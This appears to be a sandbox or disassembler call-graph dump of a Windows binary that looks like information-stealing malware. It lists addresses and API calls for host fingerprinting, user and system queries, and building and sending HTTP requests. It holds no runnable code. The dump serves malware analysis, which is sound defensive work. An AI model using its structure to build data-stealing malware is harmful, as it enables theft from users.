40e321 lstrcpy 79637->79638 79639 40117f 79638->79639 79640 412358 _EH_prolog 79639->79640 79641 411ff8 _EH_prolog 79640->79641 79642 41237e 79641->79642 79643 40e35e 2 API calls 79642->79643 79644 412392 79643->79644 79645 40e35e 2 API calls 79644->79645 79646 4123a2 79645->79646 79647 40e35e 2 API calls 79646->79647 79648 4123af 79647->79648 79649 40e2ea lstrcpy 79648->79649 79650 4123bc 79649->79650 79651 40e2ea lstrcpy 79650->79651 79652 4123cd 79651->79652 79653 40e2ea lstrcpy 79652->79653 79654 4123de 79653->79654 79655 40e2ea lstrcpy 79654->79655 79656 4123ef 79655->79656 79657 40e2ea lstrcpy 79656->79657 79658 412400 79657->79658 79659 40e2ea lstrcpy 79658->79659 79746 412411 79659->79746 79660 4020bd lstrcpy 79660->79746 79662 4020f1 lstrcpy 79662->79746 79663 40e321 lstrcpy 79663->79746 79664 41253d StrCmpCA 79664->79746 79665 4125d3 StrCmpCA 79666 412e94 79665->79666 79665->79746 79667 40e3a8 lstrcpy 79666->79667 79668 412ea3 79667->79668 80781 4020f1 79668->80781 79671 40e3a8 lstrcpy 79673 412ebd 79671->79673 79672 4127aa StrCmpCA 79674 412e4c 79672->79674 79672->79746 80784 40224a lstrcpy 79673->80784 79675 40e3a8 lstrcpy 79674->79675 79676 412e5b 79675->79676 80779 40213f lstrcpy 79676->80779 79677 40e3a8 lstrcpy 79677->79746 79681 412e64 79684 40e3a8 lstrcpy 79681->79684 79682 412ed2 79685 40e3a8 lstrcpy 79682->79685 79683 412981 StrCmpCA 79686 412e07 79683->79686 79683->79746 79687 412e75 79684->79687 79688 412ee0 79685->79688 79692 40e3a8 lstrcpy 79686->79692 80780 402264 lstrcpy 79687->80780 80785 411d25 lstrcpy _EH_prolog 79688->80785 79689 40213f lstrcpy 79689->79746 79690 411b64 33 API calls 79690->79746 79691 402159 lstrcpy 79691->79746 79693 412e16 79692->79693 80777 40218d lstrcpy 79693->80777 79698 412e1f 79701 40e3a8 lstrcpy 79698->79701 79699 412df4 79705 40e3a8 lstrcpy 79699->79705 79700 412b58 StrCmpCA 79703 412db6 79700->79703 79700->79746 79704 412e30 79701->79704 79702 40210b lstrcpy 79702->79746 79706 40e3a8 lstrcpy 79703->79706 80778 40227e lstrcpy 79704->80778 79715 412d93 79705->79715 79709 412dc5 79706->79709 79707 40218d lstrcpy 79707->79746 79708 4021a7 lstrcpy 79708->79746 80775 4021db lstrcpy 79709->80775 79710 412714 StrCmpCA 79710->79746 79714 412dce 79716 40e3a8 lstrcpy 79714->79716 80774 411d25 lstrcpy _EH_prolog 79715->80774 79719 412ddf 79716->79719 79717 412d29 StrCmpCA 79720 412d44 79717->79720 79721 412d34 Sleep 79717->79721 80776 402298 lstrcpy 79719->80776 79722 40e3a8 lstrcpy 79720->79722 79721->79746 79726 412d53 79722->79726 79723 401128 _EH_prolog lstrcpy 79723->79746 79724 4021f5 lstrcpy 79724->79746 79725 4128eb StrCmpCA 79725->79746 80772 402229 lstrcpy 79726->80772 79730 412d5c 79733 40e3a8 lstrcpy 79730->79733 79731 412db1 79732 411ce1 _EH_prolog 79731->79732 79734 412f54 79732->79734 79735 412d6d 79733->79735 79737 4010d8 _EH_prolog 79734->79737 80773 4022b2 lstrcpy 79735->80773 79736 411a77 28 API calls 79736->79746 79739 412f60 79737->79739 79738 402229 lstrcpy 79738->79746 79747 4120ff 79739->79747 79740 412ac2 StrCmpCA 79740->79746 79742 4021db lstrcpy 79742->79746 79743 412d85 79744 40e3a8 lstrcpy 79743->79744 79744->79715 79745 412c99 StrCmpCA 79745->79746 79746->79660 79746->79662 79746->79663 79746->79664 79746->79665 79746->79672 79746->79677 79746->79683 79746->79689 79746->79690 79746->79691 79746->79700 79746->79702 79746->79707 79746->79708 79746->79710 79746->79717 79746->79723 79746->79724 79746->79725 79746->79736 79746->79738 79746->79740 79746->79742 79746->79745 80765 4020d7 79746->80765 80768 402125 lstrcpy 79746->80768 80769 402173 lstrcpy 79746->80769 80770 4021c1 lstrcpy 79746->80770 80771 40220f lstrcpy 79746->80771 79748 40e3a8 lstrcpy 79747->79748 79749 41210f 79748->79749 79750 40e3a8 lstrcpy 79749->79750 79751 41211b 79750->79751 79752 40e3a8 lstrcpy 79751->79752 79753 412127 79752->79753 79754 411ce1 _EH_prolog 79753->79754 79755 411d01 79754->79755 79755->78853 79757 40e338 79756->79757 79758 40e34d 79757->79758 79759 40e345 lstrcpy 79757->79759 79758->78860 79759->79758 79762 40e42c 79760->79762 79761 40e450 79761->78866 79762->79761 79763 40e43e lstrcpy lstrcat 79762->79763 79763->79761 79764->78870 79766 40e2ea lstrcpy 79765->79766 79767 4020b8 79766->79767 79768 40efc1 _EH_prolog GetWindowsDirectoryA 79767->79768 79769 40eff3 79768->79769 79770 40effa GetVolumeInformationA 79768->79770 79769->79770 79771 40f02a 79770->79771 79772 40f05c GetProcessHeap HeapAlloc 79771->79772 79773 40f071 79772->79773 79774 40f07f wsprintfA lstrcat 79772->79774 79775 40e2ea lstrcpy 79773->79775 80786 40ef86 GetCurrentHwProfileA 79774->80786 79777 40f07a 79775->79777 79777->78877 79778 40f0af 79779 40f0be lstrlen 79778->79779 79780 40f0d2 79779->79780 80790 40fbd6 lstrcpy malloc strncpy 79780->80790 79782 40f0dc 79783 40f0ea lstrcat 79782->79783 79784 40f0fd 79783->79784 79785 40e2ea lstrcpy 79784->79785 79786 40f10e 79785->79786 79786->79777 79788 40e321 lstrcpy 79787->79788 79789 403ad8 79788->79789 80791 403a07 _EH_prolog 79789->80791 79791 403ae4 79792 40e2ea lstrcpy 79791->79792 79793 403b01 79792->79793 79794 40e2ea lstrcpy 79793->79794 79795 403b14 79794->79795 79796 40e2ea lstrcpy 79795->79796 79797 403b25 79796->79797 79798 40e2ea lstrcpy 79797->79798 79799 403b36 79798->79799 79800 40e2ea lstrcpy 79799->79800 79801 403b47 79800->79801 79802 403b57 InternetOpenA StrCmpCA 79801->79802 79803 403b79 79802->79803 79804 4040d5 InternetCloseHandle 79803->79804 79805 40f5de 3 API calls 79803->79805 79818 4040e9 79804->79818 79806 403b8f 79805->79806 79807 40e3ef 3 API calls 79806->79807 79808 403ba2 79807->79808 79809 40e3a8 lstrcpy 79808->79809 79810 403baf 79809->79810 79811 40e463 4 API calls 79810->79811 79812 403bd8 79811->79812 79813 40e3a8 lstrcpy 79812->79813 79814 403be5 79813->79814 79815 40e463 4 API calls 79814->79815 79816 403c02 79815->79816 79817 40e3a8 lstrcpy 79816->79817 79819 403c0f 79817->79819 79818->78880 79820 40e3ef 3 API calls 79819->79820 79821 403c2b 79820->79821 79822 40e3a8 lstrcpy 79821->79822 79823 403c38 79822->79823 79824 40e463 4 API calls 79823->79824 79825 403c55 79824->79825 79826 40e3a8 lstrcpy 79825->79826 79827 403c62 79826->79827 79828 40e463 4 API calls 79827->79828 79829 403c7f 79828->79829 79830 40e3a8 lstrcpy 79829->79830 79831 403c8c 79830->79831 79832 40e463 4 API calls 79831->79832 79833 403caa 79832->79833 79834 40e3ef 3 API calls 79833->79834 79835 403cbd 79834->79835 79836 40e3a8 lstrcpy 79835->79836 79837 403cca 79836->79837 79838 403ce2 InternetConnectA 79837->79838 79838->79804 79839 403d08 HttpOpenRequestA 79838->79839 79840 403d41 79839->79840 79841 4040cc InternetCloseHandle 79839->79841 79842 403d45 InternetSetOptionA 79840->79842 79843 403d5b 79840->79843 79841->79804 79842->79843 79844 40e463 4 API calls 79843->79844 79845 403d6c 79844->79845 79846 40e3a8 lstrcpy 79845->79846 79847 403d79 79846->79847 79848 40e3ef 3 API calls 79847->79848 79849 403d95 79848->79849 79850 40e3a8 lstrcpy 79849->79850 79851 403da2 79850->79851 79852 40e463 4 API calls 79851->79852 79853 403dbf 79852->79853 79854 40e3a8 lstrcpy 79853->79854 79855 403dcc 79854->79855 79856 40e463 4 API calls 79855->79856 79857 403dea 79856->79857 79858 40e3a8 lstrcpy 79857->79858 79859 403df7 79858->79859 79860 40e463 4 API calls 79859->79860 79861 403e14 79860->79861 79862 40e3a8 lstrcpy 79861->79862 79863 403e21 79862->79863 79864 40e463 4 API calls 79863->79864 79865 403e3e 79864->79865 79866 40e3a8 lstrcpy 79865->79866 79867 403e4b 79866->79867 79868 40e3ef 3 API calls 79867->79868 79869 403e67 79868->79869 79870 40e3a8 lstrcpy 79869->79870 79871 403e74 79870->79871 79872 40e463 4 API calls 79871->79872 79873 403e91 79872->79873 79874 40e3a8 lstrcpy 79873->79874 79875 403e9e 79874->79875 79876 40e463 4 API calls 79875->79876 79877 403ebb 79876->79877 79878 40e3a8 lstrcpy 79877->79878 79879 403ec8 79878->79879 79880 40e3ef 3 API calls 79879->79880 79881 403ee4 79880->79881 79882 40e3a8 lstrcpy 79881->79882 79883 403ef1 79882->79883 79884 40e463 4 API calls 79883->79884 79885 403f0e 79884->79885 79886 40e3a8 lstrcpy 79885->79886 79887 403f1b 79886->79887 79888 40e463 4 API calls 79887->79888 79889 403f39 79888->79889 79890 40e3a8 lstrcpy 79889->79890 79891 403f46 79890->79891 79892 40e463 4 API calls 79891->79892 79893 403f63 79892->79893 79894 40e3a8 lstrcpy 79893->79894 79895 403f70 79894->79895 79896 40e463 4 API calls 79895->79896 79897 403f8d 79896->79897 79898 40e3a8 lstrcpy 79897->79898 79899 403f9a 79898->79899 79900 40e3ef 3 API calls 79899->79900 79901 403fb6 79900->79901 79902 40e3a8 lstrcpy 79901->79902 79903 403fc3 79902->79903 79904 40e2ea lstrcpy 79903->79904 79905 403fdc 79904->79905 79906 40e3ef 3 API calls 79905->79906 79907 403ff0 79906->79907 79908 40e3ef 3 API calls 79907->79908 79909 404003 79908->79909 79910 40e3a8 lstrcpy 79909->79910 79911 404010 79910->79911 79912 404030 lstrlen 79911->79912 79913 404040 79912->79913 79914 404049 lstrlen 79913->79914 80799 40e521 79914->80799 79916 404059 HttpSendRequestA 79917 4040a2 InternetReadFile 79916->79917 79918 4040b9 InternetCloseHandle 79917->79918 79921 404068 79917->79921 80800 40e355 79918->80800 79920 40e463 4 API calls 79920->79921 79921->79917 79921->79918 79921->79920 79922 40e3a8 lstrcpy 79921->79922 79922->79921 80804 40e521 79923->80804 79925 4106b4 StrCmpCA 79926 4106c6 79925->79926 79927 4106bf ExitProcess 79925->79927 79928 4106d6 strtok_s 79926->79928 79929 410823 79928->79929 79941 4106e7 79928->79941 79929->78882 79930 410808 strtok_s 79930->79929 79930->79941 79931 410753 StrCmpCA 79931->79930 79931->79941 79932 410792 StrCmpCA 79932->79930 79932->79941 79933 4107d2 StrCmpCA 79933->79930 79934 4107f4 StrCmpCA 79934->79930 79935 410737 StrCmpCA 79935->79930 79935->79941 79936 4107a7 StrCmpCA 79936->79930 79936->79941 79937 41071b StrCmpCA 79937->79930 79937->79941 79938 41077d StrCmpCA 79938->79930 79938->79941 79939 4107bc StrCmpCA 79939->79930 79940 4106ff StrCmpCA 79940->79930 79940->79941 79941->79930 79941->79931 79941->79932 79941->79933 79941->79934 79941->79935 79941->79936 79941->79937 79941->79938 79941->79939 79941->79940 79942 40e35e 2 API calls 79941->79942 79942->79941 79944 40e321 lstrcpy 79943->79944 79945 405144 79944->79945 79946 403a07 6 API calls 79945->79946 79947 405150 79946->79947 79948 40e2ea lstrcpy 79947->79948 79949 40516d 79948->79949 79950 40e2ea lstrcpy 79949->79950 79951 405180 79950->79951 79952 40e2ea lstrcpy 79951->79952 79953 405191 79952->79953 79954 40e2ea lstrcpy 79953->79954 79955 4051a2 79954->79955 79956 40e2ea lstrcpy 79955->79956 79957 4051b3 79956->79957 79958 4051c3 InternetOpenA StrCmpCA 79957->79958 79959 4051e5 79958->79959 79960 4058b5 InternetCloseHandle 79959->79960 79961 40f5de 3 API calls 79959->79961 79962 4058d0 79960->79962 79963 4051fb 79961->79963 80811 4061ef CryptStringToBinaryA 79962->80811 79964 40e3ef 3 API calls 79963->79964 79966 40520e 79964->79966 79968 40e3a8 lstrcpy 79966->79968 79972 40521b 79968->79972 79969 40e35e 2 API calls 79970 4058e9 79969->79970 79971 40e463 4 API calls 79970->79971 79973 4058f7 79971->79973 79975 40e463 4 API calls 79972->79975 79974 40e3a8 lstrcpy 79973->79974 79979 405903 79974->79979 79976 405244 79975->79976 79977 40e3a8 lstrcpy 79976->79977 79978 405251 79977->79978 79980 40e463 4 API calls 79978->79980 79981 4010d8 _EH_prolog 79979->79981 79982 40526e 79980->79982 79983 405961 79981->79983 79984 40e3a8 lstrcpy 79982->79984 79983->78888 79985 40527b 79984->79985 79986 40e3ef 3 API calls 79985->79986 79987 405297 79986->79987 79988 40e3a8 lstrcpy 79987->79988 79989 4052a4 79988->79989 79990 40e463 4 API calls 79989->79990 79991 4052c1 79990->79991 79992 40e3a8 lstrcpy 79991->79992 79993 4052ce 79992->79993 79994 40e463 4 API calls 79993->79994 79995 4052eb 79994->79995 79996 40e3a8 lstrcpy 79995->79996 79997 4052f8 79996->79997 79998 40e463 4 API calls 79997->79998 79999 405316 79998->79999 80000 40e3ef 3 API calls 79999->80000 80001 405329 80000->80001 80002 40e3a8 lstrcpy 80001->80002 80003 405336 80002->80003 80004 40534e InternetConnectA 80003->80004 80004->79960 80005 405374 HttpOpenRequestA 80004->80005 80006 4053ab 80005->80006 80007 4058ac InternetCloseHandle 80005->80007 80008 4053c5 80006->80008 80009 4053af InternetSetOptionA 80006->80009 80007->79960 80010 40e463 4 API calls 80008->80010 80009->80008 80011 4053d6 80010->80011 80012 40e3a8 lstrcpy 80011->80012 80013 4053e3 80012->80013 80014 40e3ef 3 API calls 80013->80014 80015 4053ff 80014->80015 80016 40e3a8 lstrcpy 80015->80016 80017 40540c 80016->80017 80018 40e463 4 API calls 80017->80018 80019 405429 80018->80019 80020 40e3a8 lstrcpy 80019->80020 80021 405436 80020->80021 80022 40e463 4 API calls 80021->80022 80023 405454 80022->80023 80024 40e3a8 lstrcpy 80023->80024 80025 405461 80024->80025 80026 40e463 4 API calls 80025->80026 80027 40547f 80026->80027 80028 40e3a8 lstrcpy 80027->80028 80029 40548c 80028->80029 80030 40e463 4 API calls 80029->80030 80031 4054a9 80030->80031 80032 40e3a8 lstrcpy 80031->80032 80033 4054b6 80032->80033 80034 40e3ef 3 API calls 80033->80034 80035 4054d2 80034->80035 80036 40e3a8 lstrcpy 80035->80036 80037 4054df 80036->80037 80038 40e463 4 API calls 80037->80038 80039 4054fc 80038->80039 80040 40e3a8 lstrcpy 80039->80040 80041 405509 80040->80041 80042 40e463 4 API calls 80041->80042 80043 405526 80042->80043 80044 40e3a8 lstrcpy 80043->80044 80045 405533 80044->80045 80046 40e3ef 3 API calls 80045->80046 80047 40554f 80046->80047 80048 40e3a8 lstrcpy 80047->80048 80049 40555c 80048->80049 80050 40e463 4 API calls 80049->80050 80051 405579 80050->80051 80052 40e3a8 lstrcpy 80051->80052 80053 405586 80052->80053 80054 40e463 4 API calls 80053->80054 80055 4055a4 80054->80055 80056 40e3a8 lstrcpy 80055->80056 80057 4055b1 80056->80057 80058 40e463 4 API calls 80057->80058 80059 4055ce 80058->80059 80060 40e3a8 lstrcpy 80059->80060 80061 4055db 80060->80061 80062 40e463 4 API calls 80061->80062 80063 4055f8 80062->80063 80064 40e3a8 lstrcpy 80063->80064 80065 405605 80064->80065 80066 4020a3 lstrcpy 80065->80066 80067 40561a 80066->80067 80068 40e3ef 3 API calls 80067->80068 80069 40562c 80068->80069 80070 40e3a8 lstrcpy 80069->80070 80071 405639 80070->80071 80072 40e463 4 API calls 80071->80072 80073 405662 80072->80073 80074 40e3a8 lstrcpy 80073->80074 80075 40566f 80074->80075 80076 40e463 4 API calls 80075->80076 80077 40568c 80076->80077 80078 40e3a8 lstrcpy 80077->80078 80079 405699 80078->80079 80080 40e3ef 3 API calls 80079->80080 80081 4056b5 80080->80081 80082 40e3a8 lstrcpy 80081->80082 80083 4056c2 80082->80083 80084 40e463 4 API calls 80083->80084 80085 4056df 80084->80085 80086 40e3a8 lstrcpy 80085->80086 80087 4056ec 80086->80087 80088 40e463 4 API calls 80087->80088 80089 40570a 80088->80089 80090 40e3a8 lstrcpy 80089->80090 80091 405717 80090->80091 80092 40e463 4 API calls 80091->80092 80093 405734 80092->80093 80094 40e3a8 lstrcpy 80093->80094 80095 405741 80094->80095 80096 40e463 4 API calls 80095->80096 80097 40575e 80096->80097 80098 40e3a8 lstrcpy 80097->80098 80099 40576b 80098->80099 80100 40e3ef 3 API calls 80099->80100 80101 405787 80100->80101 80102 40e3a8 lstrcpy 80101->80102 80103 405794 80102->80103 80104 4057a8 lstrlen 80103->80104 80805 40e521 80104->80805 80106 4057b9 lstrlen GetProcessHeap HeapAlloc 80806 40e521 80106->80806 80108 4057db lstrlen 80807 40e521 80108->80807 80110 4057eb memcpy 80808 40e521 80110->80808 80112 4057fd lstrlen 80113 40580d 80112->80113 80114 405816 lstrlen memcpy 80113->80114 80809 40e521 80114->80809 80116 405832 lstrlen 80810 40e521 80116->80810 80118 405842 HttpSendRequestA 80119 40588e InternetReadFile 80118->80119 80120 4058a5 InternetCloseHandle 80119->80120 80122 405854 80119->80122 80120->80007 80121 40e463 4 API calls 80121->80122 80122->80119 80122->80120 80122->80121 80123 40e3a8 lstrcpy 80122->80123 80123->80122 80816 40e521 80124->80816 80126 4100f6 strtok_s 80127 41015f 80126->80127 80128 410103 80126->80128 80127->78890 80129 410148 strtok_s 80128->80129 80130 40e35e 2 API calls 80128->80130 80131 40e35e 2 API calls 80128->80131 80129->80127 80129->80128 80130->80129 80131->80128 80817 40e521 80132->80817 80134 40ff9f strtok_s 80135 4100b0 80134->80135 80142 40ffb0 80134->80142 80135->78898 80136 410061 StrCmpCA 80136->80142 80137 40e35e 2 API calls 80138 410093 strtok_s 80137->80138 80138->80135 80138->80142 80139 410030 StrCmpCA 80139->80142 80140 41000b StrCmpCA 80140->80142 80141 40ffdd StrCmpCA 80141->80142 80142->80136 80142->80137 80142->80138 80142->80139 80142->80140 80142->80141 80144 40e2ea lstrcpy 80143->80144 80145 41315e 80144->80145 80146 40e463 4 API calls 80145->80146 80147 413173 80146->80147 80148 40e3a8 lstrcpy 80147->80148 80149 413180 80148->80149 80818 402089 80149->80818 80152 40e3ef 3 API calls 80153 4131a7 80152->80153 80154 40e3a8 lstrcpy 80153->80154 80155 4131b4 80154->80155 80156 40e463 4 API calls 80155->80156 80157 4131dd 80156->80157 80158 40e3a8 lstrcpy 80157->80158 80159 4131ea 80158->80159 80160 40e463 4 API calls 80159->80160 80161 413207 80160->80161 80162 40e3a8 lstrcpy 80161->80162 80163 413214 80162->80163 80164 40e463 4 API calls 80163->80164 80165 413231 80164->80165 80166 40e3a8 lstrcpy 80165->80166 80167 41323e 80166->80167 80821 40e6be GetProcessHeap HeapAlloc GetLocalTime wsprintfA 80167->80821 80169 41324f 80170 40e463 4 API calls 80169->80170 80171 41325c 80170->80171 80172 40e3a8 lstrcpy 80171->80172 80173 413269 80172->80173 80174 40e463 4 API calls 80173->80174 80175 413286 80174->80175 80176 40e3a8 lstrcpy 80175->80176 80177 413293 80176->80177 80178 40e463 4 API calls 80177->80178 80179 4132b0 80178->80179 80180 40e3a8 lstrcpy 80179->80180 80181 4132bd 80180->80181 80822 40eef9 memset RegOpenKeyExA 80181->80822 80183 4132ce 80184 40e463 4 API calls 80183->80184 80185 4132db 80184->80185 80186 40e3a8 lstrcpy 80185->80186 80187 4132e8 80186->80187 80188 40e463 4 API calls 80187->80188 80189 413305 80188->80189 80190 40e3a8 lstrcpy 80189->80190 80191 413312 80190->80191 80192 40e463 4 API calls 80191->80192 80193 41332f 80192->80193 80194 40e3a8 lstrcpy 80193->80194 80195 41333c 80194->80195 80196 40ef86 2 API calls 80195->80196 80197 413351 80196->80197 80198 40e3ef 3 API calls 80197->80198 80199 413363 80198->80199 80200 40e3a8 lstrcpy 80199->80200 80201 413370 80200->80201 80202 40e463 4 API calls 80201->80202 80203 413399 80202->80203 80204 40e3a8 lstrcpy 80203->80204 80205 4133a6 80204->80205 80206 40e463 4 API calls 80205->80206 80207 4133c3 80206->80207 80208 40e3a8 lstrcpy 80207->80208 80209 4133d0 80208->80209 80210 40efc1 13 API calls 80209->80210 80211 4133e5 80210->80211 80212 40e3ef 3 API calls 80211->80212 80213 4133f7 80212->80213 80214 40e3a8 lstrcpy 80213->80214 80215 413404 80214->80215 80216 40e463 4 API calls 80215->80216 80217 41342d 80216->80217 80218 40e3a8 lstrcpy 80217->80218 80219 41343a 80218->80219 80220 40e463 4 API calls 80219->80220 80221 413457 80220->80221 80222 40e3a8 lstrcpy 80221->80222 80223 413464 80222->80223 80224 413470 GetCurrentProcessId 80223->80224 80826 40fa83 OpenProcess 80224->80826 80227 40e3ef 3 API calls 80228 413493 80227->80228 80229 40e3a8 lstrcpy 80228->80229 80230 4134a0 80229->80230 80231 40e463 4 API calls 80230->80231 80232 4134c9 80231->80232 80233 40e3a8 lstrcpy 80232->80233 80234 4134d6 80233->80234 80235 40e463 4 API calls 80234->80235 80236 4134f3 80235->80236 80237 40e3a8 lstrcpy 80236->80237 80238 413500 80237->80238 80239 40e463 4 API calls 80238->80239 80240 41351d 80239->80240 80241 40e3a8 lstrcpy 80240->80241 80242 41352a 80241->80242 80243 40e463 4 API calls 80242->80243 80244 413547 80243->80244 80245 40e3a8 lstrcpy 80244->80245 80246 413554 80245->80246 80831 40f12f GetProcessHeap HeapAlloc 80246->80831 80249 40e463 4 API calls 80250 413572 80249->80250 80251 40e3a8 lstrcpy 80250->80251 80252 41357f 80251->80252 80253 40e463 4 API calls 80252->80253 80254 41359c 80253->80254 80255 40e3a8 lstrcpy 80254->80255 80256 4135a9 80255->80256 80257 40e463 4 API calls 80256->80257 80258 4135c6 80257->80258 80259 40e3a8 lstrcpy 80258->80259 80260 4135d3 80259->80260 80837 40f242 _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 80260->80837 80263 40e3ef 3 API calls 80264 4135fa 80263->80264 80265 40e3a8 lstrcpy 80264->80265 80266 413607 80265->80266 80267 40e463 4 API calls 80266->80267 80268 413630 80267->80268 80269 40e3a8 lstrcpy 80268->80269 80270 41363d 80269->80270 80271 40e463 4 API calls 80270->80271 80272 41365a 80271->80272 80273 40e3a8 lstrcpy 80272->80273 80274 413667 80273->80274 80851 40f3cb _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 80274->80851 80277 40e3ef 3 API calls 80278 41368e 80277->80278 80279 40e3a8 lstrcpy 80278->80279 80280 41369b 80279->80280 80281 40e463 4 API calls 80280->80281 80282 4136c4 80281->80282 80283 40e3a8 lstrcpy 80282->80283 80284 4136d1 80283->80284 80285 40e463 4 API calls 80284->80285 80286 4136ee 80285->80286 80287 40e3a8 lstrcpy 80286->80287 80288 4136fb 80287->80288 80289 40e683 3 API calls 80288->80289 80290 41370c 80289->80290 80291 40e463 4 API calls 80290->80291 80292 413719 80291->80292 80293 40e3a8 lstrcpy 80292->80293 80294 413726 80293->80294 80295 40e463 4 API calls 80294->80295 80296 413743 80295->80296 80297 40e3a8 lstrcpy 80296->80297 80298 413750 80297->80298 80299 40e463 4 API calls 80298->80299 80300 41376d 80299->80300 80301 40e3a8 lstrcpy 80300->80301 80302 41377a 80301->80302 80865 40e651 GetProcessHeap HeapAlloc GetUserNameA 80302->80865 80304 41378b 80305 40e463 4 API calls 80304->80305 80306 413798 80305->80306 80307 40e3a8 lstrcpy 80306->80307 80308 4137a5 80307->80308 80309 40e463 4 API calls 80308->80309 80310 4137c2 80309->80310 80311 40e3a8 lstrcpy 80310->80311 80312 4137cf 80311->80312 80313 40e463 4 API calls 80312->80313 80314 4137ec 80313->80314 80315 40e3a8 lstrcpy 80314->80315 80316 4137f9 80315->80316 80866 40ee84 7 API calls 80316->80866 80319 40e3ef 3 API calls 80320 413820 80319->80320 80321 40e3a8 lstrcpy 80320->80321 80322 41382d 80321->80322 80323 40e463 4 API calls 80322->80323 80324 413856 80323->80324 80325 40e3a8 lstrcpy 80324->80325 80326 413863 80325->80326 80327 40e463 4 API calls 80326->80327 80328 413880 80327->80328 80329 40e3a8 lstrcpy 80328->80329 80330 41388d 80329->80330 80869 40e76b _EH_prolog 80330->80869 80333 40e3ef 3 API calls 80334 4138b7 80333->80334 80335 40e3a8 lstrcpy 80334->80335 80336 4138c4 80335->80336 80337 40e463 4 API calls 80336->80337 80338 4138f3 80337->80338 80339 40e3a8 lstrcpy 80338->80339 80340 413900 80339->80340 80341 40e463 4 API calls 80340->80341 80342 413920 80341->80342 80343 40e3a8 lstrcpy 80342->80343 80344 41392d 80343->80344 80879 40e6be GetProcessHeap HeapAlloc GetLocalTime wsprintfA 80344->80879 80346 41393e 80347 40e463 4 API calls 80346->80347 80348 41394b 80347->80348 80349 40e3a8 lstrcpy 80348->80349 80350 413958 80349->80350 80351 40e463 4 API calls 80350->80351 80352 413978 80351->80352 80353 40e3a8 lstrcpy 80352->80353 80354 413985 80353->80354 80355 40e463 4 API calls 80354->80355 80356 4139a8 80355->80356 80357 40e3a8 lstrcpy 80356->80357 80358 4139b5 80357->80358 80880 40e718 GetProcessHeap HeapAlloc GetTimeZoneInformation 80358->80880 80361 40e463 4 API calls 80362 4139d9 80361->80362 80363 40e3a8 lstrcpy 80362->80363 80364 4139e6 80363->80364 80365 40e463 4 API calls 80364->80365 80366 413a09 80365->80366 80367 40e3a8 lstrcpy 80366->80367 80368 413a16 80367->80368 80369 40e463 4 API calls 80368->80369 80370 413a39 80369->80370 80371 40e3a8 lstrcpy 80370->80371 80372 413a46 80371->80372 80373 40e463 4 API calls 80372->80373 80374 413a69 80373->80374 80375 40e3a8 lstrcpy 80374->80375 80376 413a76 80375->80376 80883 40e89e GetProcessHeap HeapAlloc RegOpenKeyExA 80376->80883 80379 40e463 4 API calls 80380 413a9a 80379->80380 80381 40e3a8 lstrcpy 80380->80381 80382 413aa7 80381->80382 80383 40e463 4 API calls 80382->80383 80384 413aca 80383->80384 80385 40e3a8 lstrcpy 80384->80385 80386 413ad7 80385->80386 80387 40e463 4 API calls 80386->80387 80388 413af7 80387->80388 80389 40e3a8 lstrcpy 80388->80389 80390 413b04 80389->80390 80886 40e93a 80390->80886 80393 40e463 4 API calls 80394 413b22 80393->80394 80395 40e3a8 lstrcpy 80394->80395 80396 413b2f 80395->80396 80397 40e463 4 API calls 80396->80397 80398 413b4f 80397->80398 80399 40e3a8 lstrcpy 80398->80399 80400 413b5c 80399->80400 80401 40e463 4 API calls 80400->80401 80402 413b7c 80401->80402 80403 40e3a8 lstrcpy 80402->80403 80404 413b89 80403->80404 80901 40e907 GetSystemInfo wsprintfA 80404->80901 80406 413b9a 80407 40e463 4 API calls 80406->80407 80408 413ba7 80407->80408 80409 40e3a8 lstrcpy 80408->80409 80410 413bb4 80409->80410 80411 40e463 4 API calls 80410->80411 80412 413bd4 80411->80412 80413 40e3a8 lstrcpy 80412->80413 80414 413be1 80413->80414 80415 40e463 4 API calls 80414->80415 80416 413c01 80415->80416 80417 40e3a8 lstrcpy 80416->80417 80418 413c0e 80417->80418 80902 40ea07 GetProcessHeap HeapAlloc 80418->80902 80420 413c1f 80421 40e463 4 API calls 80420->80421 80422 413c2c 80421->80422 80423 40e3a8 lstrcpy 80422->80423 80424 413c39 80423->80424 80425 40e463 4 API calls 80424->80425 80426 413c59 80425->80426 80427 40e3a8 lstrcpy 80426->80427 80428 413c66 80427->80428 80429 40e463 4 API calls 80428->80429 80430 413c89 80429->80430 80431 40e3a8 lstrcpy 80430->80431 80432 413c96 80431->80432 80433 40e463 4 API calls 80432->80433 80434 413cb9 80433->80434 80435 40e3a8 lstrcpy 80434->80435 80436 413cc6 80435->80436 80907 40ea70 _EH_prolog 80436->80907 80439 40e3ef 3 API calls 80440 413cf6 80439->80440 80441 40e3a8 lstrcpy 80440->80441 80442 413d03 80441->80442 80443 40e463 4 API calls 80442->80443 80444 413d35 80443->80444 80445 40e3a8 lstrcpy 80444->80445 80446 413d42 80445->80446 80447 40e463 4 API calls 80446->80447 80448 413d65 80447->80448 80449 40e3a8 lstrcpy 80448->80449 80450 413d72 80449->80450 80914 40eda7 _EH_prolog 80450->80914 80452 413d8d 80453 40e3ef 3 API calls 80452->80453 80454 413da2 80453->80454 80455 40e3a8 lstrcpy 80454->80455 80456 413daf 80455->80456 80457 40e463 4 API calls 80456->80457 80458 413de1 80457->80458 80459 40e3a8 lstrcpy 80458->80459 80460 413dee 80459->80460 80461 40e463 4 API calls 80460->80461 80462 413e11 80461->80462 80463 40e3a8 lstrcpy 80462->80463 80464 413e1e 80463->80464 80922 40eb55 _EH_prolog 80464->80922 80466 413e3e 80467 40e3ef 3 API calls 80466->80467 80468 413e54 80467->80468 80469 40e3a8 lstrcpy 80468->80469 80470 413e61 80469->80470 80471 40eb55 15 API calls 80470->80471 80472 413e90 80471->80472 80473 40e3ef 3 API calls 80472->80473 80474 413ea6 80473->80474 80475 40e3a8 lstrcpy 80474->80475 80476 413eb3 80475->80476 80477 40e463 4 API calls 80476->80477 80478 413ee2 80477->80478 80479 40e3a8 lstrcpy 80478->80479 80480 413eef 80479->80480 80481 413f03 lstrlen 80480->80481 80482 413f13 80481->80482 80483 40e2ea lstrcpy 80482->80483 80484 413f29 80483->80484 80485 401128 2 API calls 80484->80485 80486 413f41 80485->80486 80938 412f70 _EH_prolog 80486->80938 80488 413f4e 80489 4010d8 _EH_prolog 80488->80489 80490 413f74 80489->80490 80490->78903 80492 40e321 lstrcpy 80491->80492 80493 404190 80492->80493 80494 403a07 6 API calls 80493->80494 80495 40419c GetProcessHeap RtlAllocateHeap 80494->80495 81210 40e521 80495->81210 80497 4041d6 InternetOpenA StrCmpCA 80498 4041f5 80497->80498 80499 404200 InternetConnectA 80498->80499 80500 40432b 